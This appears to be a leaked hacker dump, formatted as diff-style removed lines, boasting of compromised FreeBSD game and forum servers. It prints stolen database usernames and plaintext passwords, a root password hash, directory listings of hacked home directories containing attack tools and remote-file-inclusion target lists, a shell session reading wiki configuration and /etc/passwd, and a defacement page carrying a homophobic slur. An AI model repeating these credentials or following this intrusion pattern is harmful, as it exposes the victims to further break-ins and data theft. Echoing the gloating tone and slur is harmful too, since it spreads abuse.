-lrwxr-xr-x 1 root wheel 10 Jan 26 09:24 ->
-lrwxr-xr-x 1 root wheel 18 Feb 19 01:43 ->
-lrwxr-xr-x 1 root wheel 18 Feb 7 06:53 ->
-lrwxr-xr-x 1 root wheel 20 Mar 7 15:13 ->
-$config['db_username'] = 'untitledhosting';
-$config['db_password'] = '0DTtITKJ.yBD';
-$dbhost = 'localhost';
-$dbport = '3306';
-$dbname = 'lt3c_phpbb';
-$dbuser = 'root';
-$dbpasswd = 'jblink';
-// ^ that's the root pw too! And his nickserv pass! We rooted the box too fast
-// to even have to look up his nickserv pass
-$db_server = 'localhost';
-$db_name = 'nt-server';
-$db_user = 'nt-server';
-$db_passwd = 'nm2KHZaWzwZbWrxT';
-$db_prefix = 'smf_';
-$config['dbms'] = 'mysql';
-$config['db_hostname'] = 'localhost';
-$config['db_username'] = 'untitledhosting';
-$config['db_password'] = '0DTtITKJ.yBD';
-$config['db_name'] = 'untitledhosting';
-d><title>hacked by [seven11]</title></head><body bgcolor="black">
-<div align="center" style="color:#FFFFFF"><h1>Hacked by <font
-color="red">[seven11]inky</font>, [PURGE] are a load of faggots</h1><br></div>
-// ^ haha
-# shoutcast
-# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $
-root:$1$40oTVDjS$IXT5EmlwEhu84acMjAZ/J/:0:0::0:0:Root User:/root:/usr/bin/bash
-toor:*:0:0::0:0:Bourne-again Superuser:/root:
-daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin
-operator:*:2:5::0:0:System &:/:/usr/sbin/nologin
-bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin
-tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin
-kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin
-games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin
-news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin
-man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
-sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
-smmsp:*:25:25::0:0:Sendmail Submission
-mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
-bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin
-proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
-_pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin
-_dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin
-pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin
-www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
-nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin
-tremulous:*:1006:1006::0:0:User &:/home/tremulous:/usr/local/bin/bash
-trem-maps:*:1008:1008::0:0:User &:/home/trem-maps:/bin/sh
-mysql::88:88::0:0:MySQL Daemon:/nonexistent:/usr/local/bin/bash
-httpd::1015:1015::0:0:User &:/home/httpd:/usr/local/bin/bash
-mjestic::1017:1017::0:0:User &:/home/mjestic:/bin/sh
->> ls -la /root
-total 38474
-drwx------ 19 root wheel 2048 Mar 12 21:59 .
-drwxr-xr-x 18 root wheel 512 Jan 26 19:57 ..
--rwx------ 1 root wheel 3015 Feb 18 01:18 .bash_h1story
--rwx------ 1 root wheel 9711 Mar 22 21:17 .bash_history
--rwx------ 1 root wheel 30 Dec 15 17:10 .bash_profile
--rwx------ 1 root wheel 30 Dec 15 17:03 .bashrc
-drwx------ 4 root wheel 512 Jan 5 10:07 .cpan
--rwx------ 2 root wheel 801 Jan 12 2007 .cshrc
-drwx------ 2 root wheel 512 Mar 11 01:01 .elinks
--rwx------ 1 root wheel 892 Dec 16 11:47 .history
-drwx------ 2 root wheel 512 Dec 15 16:14 .irssi
--rwx------ 1 root wheel 143 Jan 12 2007 .k5login
--rw------- 1 root wheel 35 Mar 12 22:10 .lesshst
-drwx------ 2 root wheel 512 Mar 11 01:01 .links
--rwx------ 1 root wheel 293 Jan 12 2007 .login
--rwx------ 1 root wheel 1081 Feb 25 06:52 .mysql_history
--rwx------ 1 root wheel 17401 Mar 12 21:59 .pinerc
--rwx------ 2 root wheel 251 Jan 27 21:36 .profile
--rw------- 1 root wheel 1024 Feb 25 06:33 .rnd
-drwx------ 2 root wheel 512 Jan 29 22:58 .ssh
-drwx------ 3 root wheel 512 Jan 4 07:59 .subversion
--rwx------ 1 root wheel 0 Feb 18 01:18 .temp
-drwx------ 3 root wheel 512 Dec 16 02:48 .tremulous
-drwx------ 5 root wheel 512 Dec 18 22:15 .weechat
-drwx------ 2 root wheel 512 Dec 29 08:57
--rwx------ 1 root wheel 1764184 Dec 19 01:55
--rwx------ 1 root wheel 205609 Dec 17 15:39
--rwx------ 1 root wheel 6 Feb 16 19:36 auth.log
--rwx------ 1 root wheel 588 Dec 16 02:41 base-config.cfg
--rwx------ 1 root wheel 223 Dec 16 02:40 base-confs.cfg
--rwx------ 1 root wheel 4199 Feb 18 01:16
--rwx------ 1 root wheel 0 Feb 17 14:55
-drwx------ 3 root wheel 512 Feb 4 03:08 brute
--rwx------ 1 root wheel 65 Feb 19 02:15 db.opt
--rwx------ 1 root wheel 1827 Dec 16 03:05
-drwx------ 2 root wheel 6144 Feb 19 02:15 lt3c_phpbb
-drwx------ 2 root wheel 512 Jan 23 15:01 mail
-drwx------ 5 root wheel 512 Dec 24 01:18 master
--rwx------ 1 root wheel 45778 Dec 24 02:56 master.tgz
--rwx------ 1 root wheel 4367618 Jan 27 09:16 mbox
-drwx------ 14 root wheel 512 Jan 6 07:20 mumble
--rwx------ 1 root wheel 631037 Feb 5 00:52 myspace.jpg
--rwx------ 1 root wheel 46 Feb 19 02:13 mysql_fix.txt
--rwx------ 1 root wheel 10704 Dec 16 21:05 nmap.log
--rwx------ 1 root wheel 0 Jan 27 00:09 sshd_log
--rwx------ 1 root wheel 92 Dec 16 03:04
--rwx------ 1 root wheel 29529 Dec 23 21:59
--rwx------ 1 root wheel 30932992 Feb 3 08:57
-drwx------ 7 root wheel 512 Feb 24 00:05 trunk
--rwx------ 1 root wheel 1155345 Feb 18 02:08
-drwx------ 7 zipservers 100 512 Feb 18 22:15 tss2_rc2
-drwx------ 4 root wheel 512 Dec 15 17:53 utils
->> ls -la /usr/home
-total 56
-drwxr-xr-x 25 1013 1013 512 Mar 10 23:08 .
-drwxr-xr-x 20 root wheel 512 Mar 11 23:49 ..
-drwxr-xr-x 6 alma-server alma-server 512 Jan 21 07:40 alma-server
-drwxr-xr-x 3 1013 1013 512 Jan 27 09:22 aox
-drwxr-xr-x 4 helldive helldive 512 Feb 4 00:21 helldive
-drwxr-xr-x 2 httpd httpd 512 Jan 4 05:14 httpd
-drwxr-xr-x 5 ian ian 512 Mar 20 17:47 ian
-drwx------ 25 inaki inaki 1536 Mar 17 21:06 inaki
-drwxr-xr-x 2 inkyslair inkyslair 512 Mar 15 22:16 inkyslair
-drwxr-xr-x 3 1010 ircd 512 Dec 16 20:25 ircd
-drwxr-xr-x 4 kate kate 512 Feb 28 06:22 kate
-drwxr-xr-x 2 1013 1013 512 Dec 14 17:42 ltsvadmin
-drwxr-xr-x 5 mjestic mjestic 512 Jan 14 06:44 mjestic
-drwxr-xr-x 4 ms-clanserver ms-clanserver 512 Dec 17 04:12
-drwxr-xr-x 4 negroe negroe 512 Feb 9 10:21 negroe
-drwxr-xr-x 9 nt-server nt-server 512 Mar 9 01:36 nt-server
-drwxr-xr-x 3 1013 1013 512 Dec 16 02:28 powerover
-drwxr-xr-x 2 relentless relentless 512 Feb 7 16:55 relentless
-drwxr-xr-x 6 syense syense 512 Mar 17 07:51 syense
-drwxr-xr-x 4 test-serv test-serv 512 Jan 21 08:01 test-serv
-drwxr-xr-x 5 trem-maps trem-maps 6656 Feb 26 03:57 trem-maps
-drwxr-xr-x 4 trem12 trem12 512 Feb 18 22:53 trem12
-drwxr-xr-x 5 tremulous tremulous 512 Mar 21 20:09 tremulous
-drwxr-xr-x 2 untitledhosting untitledhosting 512 Mar 7 15:18
-drwxr-xr-x 2 1013 1013 512 Feb 23 07:23 zipservers
->> ls -la
-total 3718
-drwxrwxrwx 3 root wheel 512 Mar 11 04:15 .
-drwxr-xr-x 4 root wheel 512 Feb 6 07:03 ..
--rwxr-xr-x 1 root wheel 551940 Mar 1 04:58 __spl
-drwxr-xr-x 11 root wheel 2560 Mar 10 03:49 __sql
--rwxr-xr-x 1 root wheel 13534 Mar 5 06:47 a.out
--rw-r--r-- 1 root wheel 2412 Feb 15 07:40 attack.php
--rw-r--r-- 1 root wheel 2412 Feb 15 07:40 attack.src
--rwxr-xr-x 1 root wheel 4175 Mar 8 02:18 bd.txt
--rwxr-xr-x 1 root wheel 4168 Mar 8 02:24 bd_2.txt
--rwxrwxrwx 1 root wheel 4606 Feb 29 06:10 bopm.conf
--rw-r--r-- 1 root wheel 5784 Mar 3 13:54 cute.php
--rw-r--r-- 1 root wheel 706 Mar 9 06:23 dc.txt
--rw-r--r-- 1 root wheel 5185 Mar 1 05:55
--rw-r--r-- 1 root wheel 10486 Mar 1 06:10 get.txt
--rw-r--r-- 1 root wheel 10423 Mar 1 06:00 get.txty
--rw-r--r-- 1 root wheel 20 Mar 1 03:18 index.php
--rw-r--r-- 1 root wheel 341 Mar 7 02:22 inf.txt
--rwxr-xr-x 1 root wheel 13534 Mar 1 06:54 kmod
--rw-r--r-- 1 root wheel 3740 Mar 15 13:56 kmod.c
--rwxr-xr-x 1 root wheel 9014 Mar 5 06:47 krad
--rw-r--r-- 1 root wheel 232 Feb 14 03:11 owned.php
--rwxr-xr-x 1 root wheel 8574 Mar 1 06:17 perl_root
--rw------- 1 httpd wheel 3072000 Mar 9 05:21 php-cgi.core
--rw-r--r-- 1 root wheel 3457 Feb 29 06:33 repl.txt
->> ls -la
-total 712
-drwxr-xr-x 7 httpd httpd 512 Feb 16 19:37 .
-drwxr-xr-x 4 httpd httpd 512 Jan 26 09:24 ..
--rw-r--r-- 1 root httpd 205609 Dec 17 15:39
-drwxr-xr-x 2 httpd httpd 512 Jan 31 02:23 css
-drwxr-xr-x 13 httpd httpd 1024 Feb 9 02:40 forum
-drwxr-xr-x 2 httpd httpd 512 Jan 31 05:34 images
--rw-r--r-- 1 httpd httpd 3094 Mar 8 01:44 index.php
-drwxr-xr-x 2 httpd httpd 512 Mar 17 20:50 inky
--rw-r--r-- 1 httpd httpd 267 Mar 8 01:44 lib.php
-drwxr-xr-x 2 httpd httpd 512 Jan 31 07:01 pages
--rw-r--r-- 1 httpd httpd 904 Mar 8 01:44 temp.htm
--rw-r--r-- 1 root httpd 45 Feb 12 08:27 uta.htm
--rw-r--r-- 1 root httpd 214602 Feb 12 08:13 uta.pmd
--rw-r--r-- 1 root httpd 211734 Feb 12 08:24 uta.qcp
->> ls -la
-total 6
-drwxr-xr-x 2 relentless relentless 512 Feb 7 06:54 .
-drwxr-xr-x 4 root wheel 512 Feb 7 06:53 ..
--rw-r--r-- 1 relentless relentless 166 Feb 7 07:13 index.php
->> ls -la
-total 74
-drwxr-xr-x 10 untitledhosting untitledhosting 512 Mar 10 03:05 .
-drwxr-xr-x 4 root wheel 512 Mar 7 15:13 ..
--rw-r--r-- 1 untitledhosting untitledhosting 8 Mar 10 03:05 LAWL
-drwxr-xr-x 4 untitledhosting untitledhosting 2048 Mar 10 02:47 admin
--rwxr-xr-x 1 untitledhosting untitledhosting 5805 Mar 10 02:52 config.php
-drwxr-xr-x 2 untitledhosting untitledhosting 512 Mar 10 02:47 doc
--rw-r--r-- 1 untitledhosting untitledhosting 318 Jan 3 02:56
--rw-r--r-- 1 untitledhosting untitledhosting 330 Jan 3 02:56 fileloc.php
-drwxr-xr-x 3 untitledhosting untitledhosting 512 Mar 10 02:47 images
--rw-r--r-- 1 untitledhosting untitledhosting 8187 Jan 3 02:56 include.php
--rw-r--r-- 1 untitledhosting untitledhosting 9809 Jan 3 02:56 index.php
-drwxr-xr-x 11 untitledhosting untitledhosting 512 Mar 10 02:47 lib
--rw-r--r-- 1 untitledhosting untitledhosting 961 Jan 3 02:56 moduleinterface.php
-drwxrwxrwx 12 untitledhosting untitledhosting 512 Mar 10 02:47 modules
-drwxr-xr-x 3 untitledhosting untitledhosting 2048 Mar 10 02:47 plugins
--rw-r--r-- 1 untitledhosting untitledhosting 1955 Jan 3 02:56 preview.php
--rw-r--r-- 1 untitledhosting untitledhosting 168 Jan 3 02:56 robots.txt
--rw-r--r-- 1 untitledhosting untitledhosting 4161 Jan 3 02:56 soap.php
--rw-r--r-- 1 untitledhosting untitledhosting 2535 Jan 3 02:56 stylesheet.css
--rw-r--r-- 1 untitledhosting untitledhosting 5179 Jan 3 02:56 stylesheet.php
-drwxrwxrwx 6 untitledhosting untitledhosting 512 Mar 10 02:47 tmp
-drwxrwxrwx 4 untitledhosting untitledhosting 512 Mar 10 03:09 uploads
--rw-r--r-- 1 untitledhosting untitledhosting 1127 Jan 3 02:56 version.php
->> ls -la /home/inaki/
-total 157184
-drwx------ 25 inaki inaki 1536 Mar 17 21:06 .
-drwxr-xr-x 25 1013 1013 512 Mar 10 23:08 ..
--rwx------ 1 inaki inaki 10462 Mar 22 00:28 .bash_history
--rwx------ 1 inaki inaki 30 Dec 16 17:56 .bash_profile
--rwx------ 1 inaki inaki 30 Dec 16 17:56 .bashrc
--rw-r--r-- 1 inaki inaki 14178 Mar 4 00:00 .bot_log
--rwx------ 1 inaki inaki 767 Dec 15 16:07 .cshrc
--rw-r--r-- 1 inaki inaki 6 Mar 17 21:06 .gay-state
--rwx------ 1 inaki inaki 142 Dec 17 01:58 .history
-drwx------ 2 inaki inaki 512 Dec 18 22:12 .irssi
--rw------- 1 inaki inaki 35 Mar 9 18:42 .lesshst
-drwx------ 2 inaki inaki 512 Jan 30 21:51 .links
--rwx------ 1 inaki inaki 248 Dec 15 16:07 .login
--rwx------ 1 inaki inaki 158 Dec 15 16:07 .login_conf
--rwx------ 1 inaki inaki 373 Dec 15 16:07 .mail_aliases
--rwx------ 1 inaki inaki 331 Dec 15 16:07 .mailrc
--rwx------ 1 inaki inaki 797 Dec 15 16:07 .profile
--rwx------ 1 inaki inaki 276 Dec 15 16:07 .rhosts
--rwx------ 1 inaki inaki 975 Dec 15 16:07 .shrc
-drwx------ 2 inaki inaki 512 Feb 9 07:09 .ssh
-drwx------ 7 inaki inaki 512 Mar 17 16:56 .weechat
--rw-r--r-- 1 inaki inaki 1330 Mar 10 03:53
-drwxr-xr-x 2 inaki inaki 512 Mar 5 22:56 RFIscan
-drwx------ 17 inaki inaki 1536 Mar 12 21:55 Unreal3.2.7
--rwx------ 1 inaki inaki 2801622 Dec 29 09:01 Unreal3.2.7.tar.gz
--rw-r--r-- 1 inaki inaki 12469 Mar 7 05:27 _good_rfis.txt
-drwx------ 7 inaki inaki 1024 Dec 27 22:44 anope-1.7.19
--rwx------ 1 inaki inaki 1505639 Jun 10 2007 anope-1.7.19.tar.gz
-drwx------ 8 inaki inaki 512 Jan 13 07:25 bopm
-drwx------ 5 inaki inaki 1024 Jan 13 07:02 bopm-3.1.3
--rwx------ 1 inaki inaki 819273 May 16 2007 bopm-3.1.3.tar.gz
--rwx------ 1 inaki inaki 1424 Dec 27 21:59
--rwx------ 1 inaki inaki 1401 Dec 25 08:31
--rwx------ 1 inaki inaki 1417 Dec 27 21:57\
-drwx------ 4 inaki inaki 512 Mar 3 14:10 botpanel
--rwx------ 1 inaki inaki 11962 Feb 13 03:05 botpanel.tgz
--rwx------ 1 inaki inaki 0 Dec 23 00:06 cigarette
--rw-r--r-- 1 inaki inaki 1334 Mar 8 05:57
-drwxrwxrwx 3 inaki inaki 512 Feb 23 04:17 exe
-drwx------ 2 inaki inaki 512 Feb 9 07:43 flash
--rwx------ 1 inaki inaki 130677 Jul 14 2007 gay
--rwx------ 1 inaki inaki 2576 Nov 24 23:25
--rwxr-xr-x 1 inaki inaki 655 Mar 5 02:45
--rw-r--r-- 1 inaki inaki 121721 Mar 10 04:33 good_rfis.txt
-drwxrwxrwx 2 inaki inaki 512 Feb 21 04:08 images
-drwx------ 8 inaki inaki 512 Jan 5 09:48 ircd
--rwx------ 1 inaki inaki 2457953 Dec 19 02:58 irssi
--rwx------ 1 inaki inaki 530 Dec 19 01:34
-drwx------ 5 inaki inaki 512 Feb 17 15:56 jewgong
--rwx------ 1 inaki inaki 1507 Jan 5 08:37
--rwx------ 1 inaki inaki 5026 Feb 1 23:08 lolol
-drwx------ 4 inaki inaki 512 Jan 4 22:25
--rwx------ 1 inaki inaki 45778 Dec 24 02:22 master.tgz
-drwx------ 7 inaki inaki 512 Dec 27 22:50 misc
--rwx------ 1 inaki inaki 1993 Dec 1 19:39
-drwx------ 2 inaki inaki 512 Feb 17 11:04 music
--rwx------ 1 inaki inaki 9576448 Feb 3 09:29 openssl_installer.exe
--rwx------ 1 inaki inaki 0 Feb 11 03:27 out
-drwx------ 2 inaki inaki 512 Jan 11 20:20 oxygen
--rwx------ 1 inaki inaki 0 Nov 25 09:04 pizza
-drwx------ 2 inaki inaki 512 Jan 16 23:14 public_html
-drwx------ 2 inaki inaki 512 Jan 4 03:33 radiobot
--rwx------ 1 inaki inaki 806 Dec 16 21:17 range
--rw-r--r-- 1 inaki inaki 190367 Mar 21 21:52 rfis.txt
-drwx------ 3 inaki inaki 1024 Jan 14 00:38 seeborg-0.51
--rwx------ 1 inaki inaki 58113 Aug 15 2003 seeborg-0.51.tar.gz
--rwx------ 1 inaki inaki 825 Dec 1 17:59 server.cfg
--rwx------ 1 inaki inaki 14285284 Dec 25 03:00 sy.rar
--rwx------ 1 inaki inaki 55 Dec 8 10:30 test
--rwx------ 1 inaki inaki 67 Dec 7 12:48
-drwx------ 3 inaki inaki 512 Jan 5 09:48 testircd
--rwx------ 1 inaki inaki 0 Nov 24 22:00 trace.rt
--rwx------ 1 inaki inaki 128561152 Mar 8 00:19 weechat-curses.core
--rwx------ 1 inaki inaki 69 Dec 16 21:17
->> ls -la /usr/home/mjestic/
-total 204
-drwxr-xr-x 5 mjestic mjestic 512 Jan 14 06:44 .
-drwxr-xr-x 25 1013 1013 512 Mar 10 23:08 ..
--rw------- 1 mjestic mjestic 1404 Jan 14 06:52 .bash_history
--rw-r--r-- 1 mjestic mjestic 767 Jan 14 05:18 .cshrc
--rw-r--r-- 1 mjestic mjestic 248 Jan 14 05:18 .login
--rw-r--r-- 1 mjestic mjestic 158 Jan 14 05:18 .login_conf
--rw------- 1 mjestic mjestic 373 Jan 14 05:18 .mail_aliases
--rw-r--r-- 1 mjestic mjestic 331 Jan 14 05:18 .mailrc
--rw-r--r-- 1 mjestic mjestic 797 Jan 14 05:18 .profile
--rw------- 1 mjestic mjestic 276 Jan 14 05:18 .rhosts
--rw-r--r-- 1 mjestic mjestic 975 Jan 14 05:18 .shrc
-drwxr-xr-x 4 mjestic mjestic 512 Jan 14 06:45 .tremulous
-drwxr-xr-x 5 mjestic mjestic 512 Nov 8 07:29 arcade
--rw-r--r-- 1 mjestic mjestic 178453 Nov 8 07:30 arcade-svn971-14-vm.tar.gz
-drwxr-xr-x 3 mjestic mjestic 512 Jan 14 06:46 trem-server
-* And now for
-$ uname -a
-FreeBSD 7.0-RELEASE FreeBSD 7.0-RELEASE #0: Sun Feb 24 19:59:52
-UTC 2008 i386
-$ w
-12:22AM up 2:37, 0 users, load averages: 0.06, 0.06, 0.07
-$ ls
-$ pwd
-$ cd apache22
-$ ls -al
-total 14
-drwxr-xr-x 6 root wheel 512 Mar 8 16:40 .
-drwxr-xr-x 4 root wheel 512 Mar 8 22:03 ..
-drwxr-xr-x 2 root wheel 512 Mar 8 16:40 cgi-bin
-drwxr-xr-x 28 root wheel 1536 Mar 8 22:01 data
-drwxr-xr-x 3 root wheel 1024 Mar 8 16:40 error
-drwxr-xr-x 3 root wheel 3584 Mar 8 16:40 icons
-$ cd data
-$ ls -al
-total 120006
-drwxr-xr-x 28 root wheel 1536 Mar 8 22:01 .
-drwxr-xr-x 6 root wheel 512 Mar 8 16:40 ..
-drwxr-xr-x 3 root picatta 512 Mar 8 17:41 711chan
--rwxr-xr-x 1 root picatta 825 Mar 5 12:48 AdminSettings.sample
--rwxr-xr-x 1 root picatta 17997 Mar 5 12:48 COPYING
--rwxr-xr-x 1 root picatta 162 Mar 5 12:48 FAQ
--rwxr-xr-x 1 root picatta 175294 Mar 5 12:48 HISTORY
--rwxr-xr-x 1 root picatta 3992 Mar 5 12:48 INSTALL
--rw-r--r-- 1 root picatta 4522 Mar 5 12:48 LocalSettings.php
--rwxr-xr-x 1 root picatta 27 Mar 5 12:48 Makefile
--rwxr-xr-x 1 root picatta 44283 Mar 5 12:48 RELEASE-NOTES
--rwxr-xr-x 1 root picatta 605 Mar 5 12:48 StartProfiler.php
--rwxr-xr-x 1 root picatta 12816 Mar 5 12:48 UPGRADE
--rwxr-xr-x 1 root picatta 1316 Mar 5 12:48 api.php
-drwxr-xr-x 2 root picatta 512 Mar 8 17:41 auth
-drwxr-xr-x 3 root wheel 512 Mar 8 17:41 backup
-drwxr-xr-x 2 root picatta 512 Mar 8 17:41 bin
-drwxr-xr-x 18 root picatta 512 Mar 8 17:41 cachedir
-drwxr-xr-x 2 root picatta 512 Mar 8 17:41 cgi-bin
--rw-r--r-- 1 root picatta 1832 Mar 5 12:48 cheese.gif
--rw-r--r-- 1 root picatta 1677 Mar 5 12:48 cheese2.gif
--rwxr-xr-x 1 root picatta 122077184 Mar 5 12:48 core.21271
-drwxr-xr-x 3 root picatta 512 Mar 8 17:41 dev
-drwxr-xr-x 4 root picatta 512 Mar 8 17:41 docs
-drwxr-xr-x 2 root picatta 512 Mar 8 17:41 donate
--rw-r--r-- 1 root picatta 2037 Mar 5 12:48 epiccheese.js
--rw-r--r-- 1 root picatta 2091 Mar 5 12:48 epicfail.js
-drwxr-xr-x 2 root picatta 512 Mar 8 17:41 extensions
--rwxr-xr-x 1 root picatta 1150 Mar 5 12:48 favicon.ico
-drwxr-xr-x 2 root picatta 512 Mar 8 17:41 fimg
--rwxr-xr-x 1 root picatta 1501 Mar 5 12:48 front.php
--rwxr-xr-x 1 root picatta 173 Mar 5 12:48 google.html
-drwxr-xr-x 3 root picatta 512 Mar 8 17:41 hosted
-drwxr-xr-x 21 root picatta 512 Mar 8 17:41 images
--rwxr-xr-x 1 root picatta 1978 Mar 5 12:48 img_auth.php
-drwxr-xr-x 7 root picatta 5632 Mar 8 17:41 includes
--rwxr-xr-x 1 root picatta 113 Mar 5 12:48 index.dongs
--rwxr-xr-x 1 root picatta 1513 Mar 5 12:48 index.old
--rwxr-xr-x 1 root picatta 8716 Mar 5 12:48 index.php
--rwxr-xr-x 1 root picatta 454 Mar 5 12:48 index.php__
--rwxr-xr-x 1 root picatta 21 Mar 5 12:48 info.php
--rwxr-xr-x 1 root picatta 3899 Mar 5 12:48
-drwxr-xr-x 4 root picatta 512 Mar 8 17:41 languages
--rwxr-xr-x 1 root picatta 584 Mar 5 12:48 load.php
-drwxr-xr-x 2 root picatta 512 Mar 8 17:41 locale
--rwxr-xr-x 1 root picatta 3227 Mar 5 12:48 lol.css
-drwxr-xr-x 9 root picatta 4096 Mar 8 17:41 maintenance
-drwxr-xr-x 2 root picatta 512 Mar 8 17:41 math
--rw-r--r-- 1 root picatta 0 Mar 5 12:48 merge.php
--rwxr-xr-x 1 root picatta 19631 Mar 5 12:48 mudkipz.png
--rwxr-xr-x 1 root picatta 1532 Mar 5 12:48 opensearch_desc.php
--rwxr-xr-x 1 root picatta 65394 Mar 5 12:48 owned1.jpg
--rwxr-xr-x 1 root picatta 67133 Mar 5 12:48 owned2.jpg
--rw-r--r-- 1 picatta picatta 361 Mar 8 21:56 portl.html
--rwxr-xr-x 1 root picatta 6173 Mar 5 12:48 profileinfo.php
-drwxr-xr-x 3 root picatta 512 Mar 8 17:41 public_ftp
-drwxr-xr-x 7 root picatta 1024 Mar 8 17:41 raid
--rwxr-xr-x 1 root picatta 428 Mar 5 12:48 redir.php
--rwxr-xr-x 1 root picatta 319 Mar 5 12:48 redirect.php
--rwxr-xr-x 1 root picatta 91 Mar 5 12:48 redirect.phtml
--rwxr-xr-x 1 root picatta 92 Mar 5 12:48 robots.txt
--rwxr-xr-x 1 root picatta 1351 Mar 5 12:48 seal.php
-drwxr-xr-x 2 root picatta 512 Mar 8 17:41 serialized
--rwxr-xr-x 1 root picatta 147770 Mar 5 12:48 shit.jpg
-drwxr-xr-x 10 root picatta 1024 Mar 8 17:41 skins
-drwxr-xr-x 3 root picatta 512 Mar 8 17:41 t
--rwxr-xr-x 1 root picatta 6 Mar 5 12:48 test
--rwxr-xr-x 1 root picatta 27 Mar 5 12:48 test.php
--rwxr-xr-x 1 root picatta 53 Mar 5 12:48 test2.php
-drwxr-xr-x 2 root picatta 512 Mar 8 17:41 tests
--rwxr-xr-x 1 root picatta 2408 Mar 5 12:48 thumb.php
-drwxr-xr-x 2 root picatta 512 Mar 8 17:41 tmp
--rwxr-xr-x 1 root picatta 1384 Mar 5 12:48 trackback.php
-drwxr-xr-x 2 root picatta 512 Mar 8 17:41 vamp
--rwxr-xr-x 1 root picatta 88 Mar 5 12:48 wiki.phtml
--rwxr-xr-x 1 root picatta 1756 Mar 5 12:48 ~index.php
-$ cat LocalSettings.php
-# This file was automatically generated by the MediaWiki installer.
-# If you make manual changes, please keep track in case you need to
-# recreate them later.
-# See includes/DefaultSettings.php for all configurable settings
-# and their default values, but don't forget to make changes in _this_
-# file, not there.
-# If you customize your file layout, set $IP to the directory that contains
-# the other MediaWiki files. It will be used as a base to locate files.
-if( defined( 'MW_INSTALL_PATH' ) ) {
-} else {
- $IP = dirname( __FILE__ );
-$path = array( $IP, "$IP/includes", "$IP/languages" );
-set_include_path( implode( PATH_SEPARATOR, $path ) . PATH_SEPARATOR .
-get_include_path() );
-require_once( "includes/DefaultSettings.php" );
-# If PHP's memory limit is very low, some operations may fail.
-# ini_set( 'memory_limit', '20M' );
-if ( $wgCommandLineMode ) {
- if ( isset( $_SERVER ) && array_key_exists( 'REQUEST_METHOD', $_SERVER
-) ) {
- die( "This script must be run from the command line\n" );
- }
-} elseif ( empty( $wgNoOutputBuffer ) ) {
- ## Compress output if the browser supports it
- if( !ini_get( 'zlib.output_compression' ) ) @ob_start( 'ob_gzhandler'
-$wgSitename = "Insurgency Wiki";
-## The URL base path to the directory containing the wiki;
-## defaults for all runtime URL paths are based off of this.
-$wgScriptPath = "";
-## For more information on customizing the URLs please see:
-$wgShowIPinHeader = false;
-$wgEnableEmail = true;
-$wgEnableUserEmail = true;
-$wgEmergencyContact = "";
-$wgPasswordSender = "";
-## For a detailed description of the following switches see
-## and
-## There are many more options for fine tuning available see
-## /includes/DefaultSettings.php
-## UPO means: this is also a user preference option
-$wgEnotifUserTalk = true; # UPO
-$wgEnotifWatchlist = true; # UPO
-$wgEmailAuthentication = true;
-$wgDBtype = "mysql";
-$wgDBserver = "localhost";
-$wgDBname = "partyvan_insurgency";
-$wgDBuser = "root";
-$wgDBpassword = "lolcats8295";
-$wgDBport = "3306";
-$wgDBprefix = "mw_";
-# Schemas for Postgres
-$wgDBmwschema = "mediawiki";
-$wgDBts2schema = "public";
-# Experimental charset support for MySQL 4.1/5.0.
-$wgDBmysql5 = false;
-## Shared memory settings
-$wgFileCacheDirectory = '/home/partyvan/public_html/cachedir/';
-$wgShowIPinHeader = false;
-$wgUseFileCache = true;
-$wgMainCacheType = CACHE_MEMCACHED;
-$wgMemCachedServers = array();
-$wgUseMemCached = true;
-$wgMemCachedServers = array( "" );
-## To enable image uploads, make sure the 'images' directory
-## is writable, then set this to true:
-$wgEnableUploads = true;
-$wgUseImageResize = true;
-$wgUseImageMagick = true;
-$wgImageMagickConvertCommand = "/usr/bin/convert";
-## If you want to use image uploads under safe mode,
-## create the directories images/archive, images/thumb and
-## images/temp, and make them all writable. Then uncomment
-## this, if it's not already uncommented:
-# $wgHashedUploadDirectory = false;
-## If you have the appropriate support software installed
-## you can enable inline LaTeX equations:
-$wgUseTeX = false;
-$wgLocalInterwiki = $wgSitename;
-$wgLanguageCode = "en";
-$wgProxyKey =
-## Default skin: you can change the default skin. Use the internal symbolic
-## names, ie 'standard', 'nostalgia', 'cologneblue', 'monobook':
-$wgDefaultSkin = 'nostalgia';
-## For attaching licensing metadata to pages, and displaying an
-## appropriate copyright notice / icon. GNU Free Documentation
-## License and Creative Commons licenses are supported so far.
-$wgEnableCreativeCommonsRdf = true;
-$wgRightsPage = ""; # Set to the title of a wiki page that describes your
-$wgRightsUrl = "";
-$wgRightsText = "Attribution-Noncommercial-Share Alike 3.0 ";
-$wgRightsIcon = "";
-# $wgRightsCode = "by-nc-sa"; # Not yet used
-$wgDiff3 = "/usr/bin/diff3";
-# When you make changes to this configuration file, this will make
-# sure that cached pages are cleared.
-$configdate = gmdate( 'YmdHis', @filemtime( __FILE__ ) );
-$wgCacheEpoch = max( $wgCacheEpoch, $configdate );
-$ cat /etc/passwd
-# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $
-root:*:0:0:Charlie &:/root:/bin/csh
-toor:*:0:0:Bourne-again Superuser:/root:
-daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
-operator:*:2:5:System &:/:/usr/sbin/nologin
-bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
-tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
-kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
